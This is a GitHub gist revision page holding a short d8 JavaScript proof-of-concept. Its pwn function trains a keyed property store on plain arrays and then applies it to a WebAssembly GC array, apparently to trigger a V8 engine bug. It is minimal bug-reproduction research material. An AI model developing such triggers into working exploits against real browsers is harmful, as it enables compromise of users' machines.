Last active
June 4, 2024 12:09
-
-
Save mistymntncop/b6599b24cf57fb1b5c5be63a2f702015 to your computer and use it in GitHub Desktop.
Revisions
-
mistymntncop revised this gist
Jun 4, 2024 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -32,7 +32,7 @@ function pwn() { %DebugPrint(set_keyed_prop); try { set_keyed_prop(wasm_array, 0, 0x1337); } catch(err){ } } -
Jun 4, 2024 . 1 changed file with 5 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -30,5 +30,10 @@ function pwn() { set_keyed_prop([], 0, 0x1337); %DebugPrint(set_keyed_prop); try { set_keyed_prop(wasm_array, "foo", 0x1337); } catch(err){ } } pwn(); -
Jun 4, 2024 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,34 @@ d8.file.execute("wasm-module-builder.js"); let builder = new WasmModuleBuilder(); let array_type = builder.addArray(kWasmI32, true); builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)])) .addBody([ kExprLocalGet, 0, kGCPrefix, kExprArrayNewDefault, array_type, ]) .exportFunc(); let wasm_instance = builder.instantiate({}); let wasm = wasm_instance.exports; function set_keyed_prop(arr, key, val) { arr[key] = val; } function pwn() { for(let i = 0; i < 9; i++) { set_keyed_prop([], 0, 0x1337); } let wasm_array = wasm.create_array(0); try { set_keyed_prop(wasm_array, "foo", 0x1337); } catch(err){ } set_keyed_prop([], 0, 0x1337); %DebugPrint(set_keyed_prop); } pwn();